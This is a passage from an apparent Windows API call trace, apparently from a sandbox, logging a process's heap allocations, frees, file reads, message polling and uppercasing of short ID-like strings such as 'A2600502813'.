(HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0100.861] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cab020 [0100.864] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0100.864] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x7189, lpOverlapped=0x0) returned 1 [0100.866] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0100.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0100.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.866] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0100.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.866] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7189) returned 0x2a7a130 [0100.867] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cab020 | out: hHeap=0x2af0000) returned 1 [0100.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0100.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0100.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0100.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0100.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0100.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0100.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0100.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7189) returned 0x2a812c8 [0100.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0100.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.870] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0100.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0100.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0100.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7189) returned 0x2a7a130 [0100.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0100.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0100.871] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0100.871] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7189) returned 0x2a7a130 [0100.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0100.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0100.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0100.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0100.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0100.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0100.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x7189) returned 0x2a88460 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0100.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0100.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0100.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0100.873] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0100.873] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0100.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0100.873] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0100.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0100.874] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0100.874] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0100.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0100.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0100.875] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0100.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0100.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.875] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0100.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0100.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0100.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0100.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0100.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0100.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0100.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0100.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78390 | out: hHeap=0x2af0000) returned 1 [0100.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0100.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0100.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0100.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0100.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.926] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0100.926] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0100.927] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0100.927] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0100.927] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0100.927] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0100.927] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0100.928] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0100.928] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748f8 